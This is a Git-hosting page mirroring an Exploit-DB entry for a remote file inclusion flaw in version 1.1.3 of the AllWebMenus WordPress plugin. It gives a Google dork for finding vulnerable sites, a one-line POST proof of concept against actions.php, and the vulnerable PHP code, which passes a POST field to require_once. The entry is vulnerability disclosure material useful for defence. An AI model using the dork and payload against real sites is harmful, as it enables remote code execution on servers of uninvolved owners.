bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/17861.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
677 B
Text
Raw Blame History

# Exploit Title: Allwebmenus Wordpress Menu Plugin Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/allwebmenus-wordpress-menu-plugin
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/download/
# Version: 1.1.3 (tested)
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php POST="abspath=RFI"
---
Vulnerable Code
---
/** Loads the WordPress Environment and Template */
if (!isset($_POST["abspath"]))
die();
require_once(urldecode((string) $_POST["abspath"].'wp-blog-header.php'));
Reference in a new issue View git blame Copy permalink